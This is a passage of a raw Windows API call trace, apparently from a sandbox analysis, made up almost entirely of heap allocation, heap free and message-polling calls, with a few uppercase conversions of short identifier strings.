dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0212.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0212.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b08 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1770b) returned 0x2ac5f90 [0212.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71c28 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0212.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71cf8 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0212.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71c08 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0212.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab1d0 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0212.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0212.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1770b) returned 0x2a8a138 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0212.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0212.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0212.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0212.422] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0212.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0212.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0212.423] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0212.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0212.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0212.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0212.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0212.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0212.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0212.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0212.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0212.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0212.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0212.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0212.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0212.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0212.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0212.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0212.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0212.424] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0212.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0212.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0212.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0212.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0212.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0212.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0212.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0212.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0212.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0212.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0212.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.424] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0212.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0212.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0212.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0212.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0212.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0212.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.425] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0212.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0212.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0212.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0212.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.426] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0212.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0212.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0212.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0212.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0212.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0212.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0212.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0212.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0212.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0212.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0212.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0212.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.426] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0212.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0212.427] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0212.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0212.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab170 [0212.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0212.427] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0212.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0212.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0212.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0212.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0212.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0212.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0212.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0212.427] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0212.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0212.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0212.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0212.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0212.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0212.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0212.427] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0212.428] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0212.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0212.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0212.428] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0212.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab638 [0212.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854110 [0212.428] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0212.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0212.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0212.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0212.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0212.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0212.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0212.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0212.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0212.428] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0212.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0212.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0212.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0212.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0212.429] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0212.429] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0212.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0212.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0212.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0212.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0212.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0212.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0212.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0212.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0212.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0212.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854110 | out: hHeap=0x2af0000) returned 1 [0212.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0212.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0212.429] RtlAllocateHeap 